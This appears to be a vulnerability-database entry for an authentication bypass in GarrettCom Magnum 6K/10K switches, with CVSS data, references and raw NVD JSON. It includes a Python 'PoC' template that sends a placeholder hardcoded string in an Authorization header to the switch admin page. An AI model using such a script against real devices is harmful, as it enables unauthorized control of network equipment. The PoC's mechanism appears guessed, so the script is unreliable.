CVE-2017-20234

Description

GarrettCom Magnum 6K and 10K managed switches contain an authentication bypass vulnerability that allows unauthenticated attackers to gain unauthorized access by exploiting a hardcoded string in the authentication mechanism. Attackers can bypass login controls to access administrative functions and sensitive switch configuration without valid credentials.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

GarrettCom Magnum 6K

GarrettCom Magnum 10K

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_ip = "<TARGET_IP>"
target_url = f"http://{target_ip}/index.html"  # Admin interface URL

# The hardcoded string used for bypass (Example value, replace with actual token)
bypass_header_value = "HARDCODED_AUTH_STRING"

# Prepare headers with the hardcoded bypass string
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Authorization": bypass_header_value,  # Injection point for the bypass
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
}

try:
    # Send request to the target
    response = requests.get(target_url, headers=headers, timeout=10)

    # Check if access was granted (e.g., HTTP 200 OK and presence of admin content)
    if response.status_code == 200 and ("Magnum" in response.text or "Configuration" in response.text):
        print("[+] Authentication bypass successful!")
        print("[+] Admin panel accessible without credentials.")
    else:
        print("[-] Failed to bypass authentication or target is not vulnerable.")
        print(f"Status Code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2017-20234
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2017-20234
[3] CVE Details https://www.cvedetails.com/cve/CVE-2017-20234/
[4] VulDB https://vuldb.com/cve/CVE-2017-20234
[5] https://assets.belden.com/m/114be964b4651983/original/Security-Bulletin-MNS-6K-10K-GarrettCom-BSECV-2017-08.pdf
[6] https://www.vulncheck.com/advisories/garrettcom-magnum-6k-and-10k-authentication-bypass-via-hardcoded-string

Raw JSON Data

JSON

{"cve": {"id": "CVE-2017-20234", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:00.087", "lastModified": "2026-04-07T13:20:55.200", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GarrettCom Magnum 6K and 10K managed switches contain an authentication bypass vulnerability that allows unauthenticated attackers to gain unauthorized access by exploiting a hardcoded string in the authentication mechanism. Attackers can bypass login controls to access administrative functions and sensitive switch configuration without valid credentials."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://assets.belden.com/m/114be964b4651983/original/Security-Bulletin-MNS-6K-10K-GarrettCom-BSECV-2017-08.pdf", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/garrettcom-magnum-6k-and-10k-authentication-bypass-via-hardcoded-string", "source": "[email protected]"}]}}